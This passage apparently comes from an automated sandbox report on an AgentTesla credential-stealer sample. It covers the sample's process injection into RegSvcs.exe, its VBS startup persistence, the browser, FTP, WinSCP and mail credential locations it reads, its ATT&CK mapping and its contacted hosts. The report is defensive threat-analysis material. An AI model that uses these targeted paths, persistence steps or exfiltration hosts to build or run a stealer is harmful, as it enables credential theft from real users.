                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E28C93 LogonUserW,0_2_00E28C93
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DD3B4C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DD4A35
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E34EF5 mouse_event,0_2_00E34EF5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\toIuQILmr1.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E281F7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E34C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E34C03
                    Source: toIuQILmr1.exe, 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp, outvaunts.exe, 00000002.00000002.2067226635.0000000000D05000.00000040.00000001.01000000.00000004.sdmp, outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: outvaunts.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF886B cpuid 0_2_00DF886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E050D7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E12230 GetUserNameW,0_2_00E12230
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E0418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E0418A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DD4AFE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4511232795.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6512, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: outvaunts.exeBinary or memory string: WIN_81
                    Source: outvaunts.exeBinary or memory string: WIN_XP
                    Source: outvaunts.exeBinary or memory string: WIN_XPe
                    Source: outvaunts.exeBinary or memory string: WIN_VISTA
                    Source: outvaunts.exeBinary or memory string: WIN_7
                    Source: outvaunts.exeBinary or memory string: WIN_8
                    Source: outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6512, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4511232795.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6512, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E46596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E46596
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E46A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E46A5A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CC6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00CC6596
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CC6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00CC6A5A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CC6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00CC6596
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CC6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00CC6A5A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    Software Packing                    		NTDS138
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets751
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection                    		Network Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588811 Sample: toIuQILmr1.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 30 ip-api.com 2->30 32 ftp.antoniomayol.com 2->32 34 antoniomayol.com 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 10 other signatures 2->46 8 toIuQILmr1.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\outvaunts.exe, PE32 8->26 dropped 62 Binary is likely a compiled AutoIt script file 8->62 14 outvaunts.exe 2 8->14         started        64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->64 18 outvaunts.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\outvaunts.vbs, data 14->28 dropped 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 70 Machine Learning detection for dropped file 14->70 76 3 other signatures 14->76 20 RegSvcs.exe 15 2 14->20         started        72 Writes to foreign memory regions 18->72 74 Maps a DLL or memory area into another process 18->74 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 antoniomayol.com 162.241.62.63, 21, 33214, 49705 UNIFIEDLAYER-AS-1US United States 20->36 38 ip-api.com 208.95.112.1, 49704, 49706, 80 TUT-ASUS United States 20->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->48 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->52 54 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 20->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal ftp login credentials 24->58 60 Tries to harvest and steal browser information (history, passwords, etc) 24->60 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    toIuQILmr1.exe76%VirustotalBrowse
                    toIuQILmr1.exe71%ReversingLabsWin32.Trojan.AutoitInject
                    toIuQILmr1.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\kinematical\outvaunts.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\kinematical\outvaunts.exe71%ReversingLabsWin32.Trojan.AutoitInject
                    C:\Users\user\AppData\Local\kinematical\outvaunts.exe76%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    antoniomayol.com
                    		162.241.62.63
                    		truefalse
                      		high
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high
                        ftp.antoniomayol.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://ip-api.com/line/?fields=hosting&RegSvcs.exe, 00000006.00000002.4510792192.0000000000FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://antoniomayol.comRegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ftp.antoniomayol.comRegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://ip-api.comRegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        208.95.112.1
                                        		ip-api.comUnited States
                                        		53334TUT-ASUSfalse
                                        162.241.62.63
                                        		antoniomayol.comUnited States
                                        		46606UNIFIEDLAYER-AS-1USfalse

                                        General Information

                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1588811
                                        Start date and time:2025-01-11 05:49:54 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 10m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:toIuQILmr1.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 55
                                        • Number of non-executed functions: 278
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        05:50:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs
                                        23:50:48API Interceptor10926290x Sleep call for process: RegSvcs.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        208.95.112.1LfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
